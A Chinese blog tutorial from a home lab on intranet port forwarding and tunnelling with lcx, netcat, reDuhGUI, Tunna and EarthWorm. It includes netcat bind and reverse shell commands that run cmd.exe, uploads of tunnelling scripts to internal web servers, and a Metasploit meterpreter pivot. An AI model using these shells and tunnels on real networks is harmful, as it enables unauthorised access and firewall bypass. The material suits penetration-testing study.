admin

内网端口转发
0x1 代理正向代理正向代理类似于一个中转跳板,代理访问外部资源。比如我有一台笔记本是国内大陆的,一台香港的vps...
扫描右侧二维码阅读全文
15
2018/05

内网端口转发

0x1 代理

正向代理

正向代理类似于一个中转跳板,代理访问外部资源。比如我有一台笔记本是国内大陆的,一台香港的vps,我想访问youtobe看一看外面的世界。由于某些规则的限制笔记本是无法进行访问youtobe的,但是vps可以访问,我就可以借助于vps去访问youtobe然后将资源返回给我的笔记本。

305504-20161112124341280-1435223816.png

客户端需要一些配置来使用正向代理比如小飞机SSR

正向代理的用途:

  • 访问原来无法访问的资源
  • 用作缓存来加速资源的访问
  • 对客户端访问授权,上网进行认证
  • 代理可以记录用户访问记录(上网行为管理),对外隐藏用户信息

反向代理

反向代理(Reverse Proxy)实际运行方式是指以代理服务器来接受internet上的连接请求,然后将请求转发给内部网络上的服务器,并将从服务器上得到的结果返回给internet上请求连接的客户端,此时代理服务器对外就表现为一个服务器

305504-20161112124341280-1435223816.png

反向代理的作用:

  • 保证内网的安全,可以使用反向代理提供WAF功能,阻止web攻击
  • 负载均衡

两者的区别:代理服务器站在客户端那边就是正向代理,代理服务器站在原始服务器那边就是反向代理

0x2 转发工具

Lcx

ip:192.168.43.100 win10
ip:192.168.43.39 win2003(开启了远程桌面)
没有内网环境所以将win2003开启了防火墙 这里win10充当了公网ip
win2003可以访问win10 win10不可以直接访问win2003

先来查看一下lcx的用法

[Usage of Packet Transmit:]
 lcx.exe -<listen|tran|slave> <option> [-log logfile]

[option:]
 -listen <ConnectPort> <TransmitPort>
 -tran   <ConnectPort> <TransmitHost> <TransmitPort>
 -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>

Lcx有两大功能,一个是端口转发(listen和slave成对使用),另一个是端口映射(tran)

将win2003的3389转发出去让win10可以连接

  1. 在内网机器上运行命令 lcx.exe -slave 192.168.43.100 6666 192.168.43.39 3389

这里是将win2003上的3389端口转发到win10的6666端口
QQ截图20180507174231.jpg

  1. 在公网机器上运行命令 lcx.exe -listen 6666 1234

QQ截图20180507174037.jpg

这里是win10监听本地的6666端口 将6666端口的请求转发到本地的1234端口
所以我们只要在win10上mstsc 127.0.0.1:1234即可连接到win2003的远程桌面

QQ截图20180507174302.jpg

nc

Netcat(简称nc)短小精悍,使用频率很高
nc在内网中经常使用的功能有两种

  1. 端口扫描
  2. 端口转发数据
端口扫描
  1. nc -v ip port 扫描某个ip的某个端口
    QQ截图20180514221439.png
  2. nc -v -z ip port-port 扫描某个ip的端口段 返回详细信息 扫描速度较慢 扫描顺序应该是倒序的
    QQ截图20180514222155.png
  3. nc-v -z -u ip port-port 扫描某个ip的UDP端口段
    QQ截图20180514222422.png
  4. nc -nvv -w时间(单位为秒) -z ip port-port 延时一段时间扫描
    QQ截图20180514222555.png
正向连接和反向连接

正向连接:
内网机器上运行: nc -l -p 3333 -t -e cmd.exe
QQ截图20180514224407.png
公网机器上运行: nc -nvv 192.168.1.102(内网机器ip) 3333(内网机器cmd绑定的端口)
QQ截图20180514224352.png

反向连接:

公网机器上执行:nc -l -vv -p 3333
QQ截图20180514224352.png

内网机器上执行: nc -t -e cmd.exe 192.168.1.104(公网ip) 3333(公网监听端口)
QQ截图20180514224820.png

ReDuhGUI

reDuh GUI 是由诺赛科技从原有的 JAVA 语言上移植到 C++语言的一个 Windows GUI 版本具有如下一些特性:

  • 不需要 JAVA 运行环境
  • 可视化操作
  • 支持 HTTP/HTTPS
  • 支持二级代理

QQ截图20180515160625.png

工作原理:
QQ截图20180515174215.png

ReDuhGui分为Gui和servers,servers包含三个脚本apsx、php、java

  1. 首先将脚本上传到内网服务器上运行
    QQ截图20180515162313.png
  2. 配置Gui
    QQ截图20180515162522.png

配置好后点击start——>create
使用127.0.0.1:1234连接下内网主机的3389远程桌面
QQ截图20180515163238.png

但是ReDuhGui得连接极其不稳定,而且速度很慢不推荐使用

Tunna

Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.
Tunna和ReDuh的工作原理是一样的通过HTTP Service 代理

Tunna需要Python环境才能运行,同样包含三个脚本

20180515174520.png

经常使用:

  1. 将脚本上传到内网主机的网站目录下

QQ截图20180521164857.png

  1. 在公网主机上执行命令 python proxy.py -u http://192.168.1.108/conn.php -l 1234 -r 3389 -v

执行后可以访问127.0.0.1:3333 来访问内网主机的远程桌面
QQ截图20180521200926.png

如果是ssh转发需要在命令后加一个参数项 -s
其他使用方法就不再进一步介绍了,有兴趣的可以看官方说明文档https://github.com/SECFORCE/Tunna
在这里值得一说的是tunna v0.1 存在metaspolit脚本的通过操作可以转到msf上 新版tunna应该是移除了此功能

v0.1 转msf:

  1. cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc
  2. msf > use exploit/windows/misc/tunna_exploit
  3. msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp
  4. msf exploit(tunna_exploit) > set RHOST x.x.x.x <-- 注意这里是指本地的公网IP
  5. msf exploit(tunna_exploit) > set TARGETURI http://xxx.x.x.x:8080/conn.jsp
  6. msf exploit(tunna_exploit) > set VERBOSE true
  7. msf exploit(tunna_exploit) > exploit -j

0x3 代理工具

Earthworm]

介绍:

该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。
工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,更多平台的支持还在维护中,敬请期待

脚本目录:
QQ截图20180521203719.png

原理:
QQ截图20180521202833.png

使用说明请参考:http://rootkiter.com/EarthWorm/

正向 SOCKS v5 服务器

前提条件:当目标网络边界存在公网IP且可任意开监听端口

  1. 上传ew到内网主机执行命令:ew_for_Win.exe -s ssocksd -l 8888

QQ截图20180521203553.png
这条命令在内网主机上开启了8888端口用于其他服务器进行正向连接,比如使用socks代理软件将nmap设置代理为192.168.1.108:8888 即可以实现对内网段的端口扫描

反弹 SOCKS v5 服务器
  1. 在公网主机上运行命令 ew_for_win.exe -s rcsocks -l 6666 -e 7777

QQ截图20180521210403.png
这里是在公网主机上添加一个转接隧道,把 6666 端口收到的代理请求转交给 7777端口

  1. 在内网主机上运行命令:ew_for_win.exe -s rsscoks -d 192.168.1.107 -e 7777

注意这里的ip要和端口要填写公网主机的ip 以及第一条命令的转接端口
QQ截图20180521210423.png

这里是因为我win10防火墙策略问题没有只要内网主机连接公网的转接端口就会被阻断连接 怎么也ping不通

多级代理请看官网的使用说明 这里不再详述

ngrok

Last modification:June 6th, 2018 at 05:29 pm
If you think my article is useful to you, please feel free to appreciate

Leave a Comment